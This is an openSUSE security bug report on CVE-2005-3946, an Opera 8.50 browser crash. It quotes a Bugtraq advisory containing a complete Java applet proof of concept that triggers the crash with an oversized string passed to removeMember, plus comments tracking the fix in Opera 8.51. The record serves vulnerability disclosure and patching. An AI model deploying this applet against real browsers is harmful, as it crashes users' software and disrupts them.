Bug 136255

Summary: VUL-0: opera: can be crashed with java-applet due to bug in native routines
Product: [openSUSE] SUSE Linux 10.1 Reporter: Thomas Biege <thomas>
Component: OtherAssignee: Lukas Tinkl <ltinkl>
Status: RESOLVED FIXED QA Contact: E-mail List <qa-bugs>
Severity: Normal    
Priority: P5 - None CC: patch-request, security-team
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   
Whiteboard: CVE-2005-3946: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
Found By: Other Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---

Description Thomas Biege 2005-12-01 08:29:08 UTC 
Hello Lukas,
we have another one.

Date: Wed, 30 Nov 2005 00:31:29 +0100
From: Marc Schoenefeld <marc.schoenefeld@gmx.org>
User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716)
To: Bugtraq <bugtraq@securityfocus.com>
Subject: Opera 8.50 DoS with simple java applet
Envelope-To: tom@electric-sheep.org

Hi y'all,

it is possible to crash the opera 8.50 browser with a simple
java applet (see below).
This was observed on Win32, Linux versions maybe affected, too.
This can be tested only at:

http://www.illegalaccess.org/exploit/opera85/OperaApplet.html

As you can see the applet crashes at 0x67c0a54c. This is
caused by a bug in a JNI routine implementing the com.opera.JSObject class.
It cannot be ruled out, that this bug is exploitable.

The opera guys were informed on the 21st of September, and
then again on 8th of October.

Please upgrade to the new Opera 8.51, which does not expose this
weakness.

Sincerely
Marc Schönefeld
marc@illegalaccess.org


>import java.applet.Applet;
>import java.awt.Graphics;
>
>import netscape.javascript.JSObject;
>
>public class OperaTest extends Applet{
>        static {
>        System.out.println("Loaded 1.2");
>    }
>        public void paint(Graphics g) {
>        System.out.println("start");
>        try {
>        netscape.javascript.JSObject jso = JSObject.getWindow(this);
>        System.out.println(jso.getClass());
>        com.opera.JSObject j = (com.opera.JSObject ) jso;
>        char[] x = new char[1000000];
>                for (int y = 0 ; y < x.length; y++) {
>            x [y] = 'A';
>        }
>        String z = new String(x);
>                    System.out.println("after evalb");
>        j.removeMember(z);
>        System.out.println("after remove");
>        }
>        catch (Exception e) {
>            e.printStackTrace();
>        }
>    }
>}
Comment 1 Marcus Meissner 2005-12-01 10:38:03 UTC 
CVE-2005-3946

Opera 8.50 allows remote attackers to cause a denial of service (crash) via a Java applet with a large string argument to the removeMember JNI method for the com.opera.JSObject class.
Comment 2 Lukas Tinkl 2005-12-01 12:31:35 UTC 
Will be fixed shortly by #134905
Comment 3 Lukas Tinkl 2005-12-01 17:09:49 UTC 
As 8.51 reportedly fixed the problem, the bug is solved; Bug 134905 has been resolved already
Comment 4 Thomas Biege 2009-10-13 20:41:01 UTC 
CVE-2005-3946: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)